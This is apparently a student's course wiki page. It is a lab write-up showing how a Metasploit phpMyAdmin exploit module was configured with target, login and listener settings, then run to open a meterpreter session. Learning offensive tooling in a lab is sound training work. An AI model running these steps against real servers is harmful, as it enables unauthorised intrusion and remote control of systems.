Metasploit - Robertsegee/SEC335 GitHub Wiki

In this lab we used the Metasploit tool to break into two different machines and gain a foothold. The first step was to enter the msf console, which is done with the command:
msfconsole -q


The next step is to identify the specific exploit to be used. The following command shows the exploit I used to break into a box that was running phpMyAdmin:
use exploit/multi/http/phpmyadmin_lfi_rce
After this is done, you must adjust the options for the exploit so that it can actually attack the target. You can check the current options with the options command:
options


Then you must set each option with the set command. The following commands were used in this assignment:
set USERNAME (username)
set PASSWORD (password)
set RHOSTS (ip of target)
set LHOST (your ip)
There are other options that can be used such as:
PROXIES - proxy chain of format type:host:port
RPORT - determine what port you are attacking
TARGETURI - base directory path
SSL - negotiate ssl/tls for outgoing connections
VHOST - HTTP server virtual host
LPORT - what port you are listening from
After you have adjusted the settings needed, use the run command to initiate the attack. After waiting a bit you will be presented with a line saying
meterpreter >
This indicates the attack worked and a session was opened.